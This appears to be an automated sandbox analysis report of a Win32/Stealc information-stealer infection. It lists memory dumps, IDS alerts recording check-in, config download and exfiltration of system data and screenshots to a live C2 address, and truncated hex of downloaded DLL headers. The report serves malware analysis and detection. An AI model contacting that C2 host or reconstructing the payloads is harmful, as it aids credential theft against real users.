Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: H_prolog3
String ID: 8I$I
API String ID: 431132790-1039593671
Opcode ID: 7c3f135253b9ba143ea74e54a72aebbe283eeea4d3df2adc653e1fee77e1efb2
Instruction ID: 6b825eba70021e468e08cd0f76bbb51a1b885d1f01aca706e2fa7001cf987cb5
Opcode Fuzzy Hash: 7c3f135253b9ba143ea74e54a72aebbe283eeea4d3df2adc653e1fee77e1efb2
Instruction Fuzzy Hash: C2F04F71E006209BDB64AB68C0483AEF6A06F09315F14456FD69A572A1C77C9D80CA4E

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 95.182.96.50:80 -> 192.168.2.6:49714
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.182.96.50:80 -> 192.168.2.6:49714
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49714 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:49714 -> 95.182.96.50:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:54:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
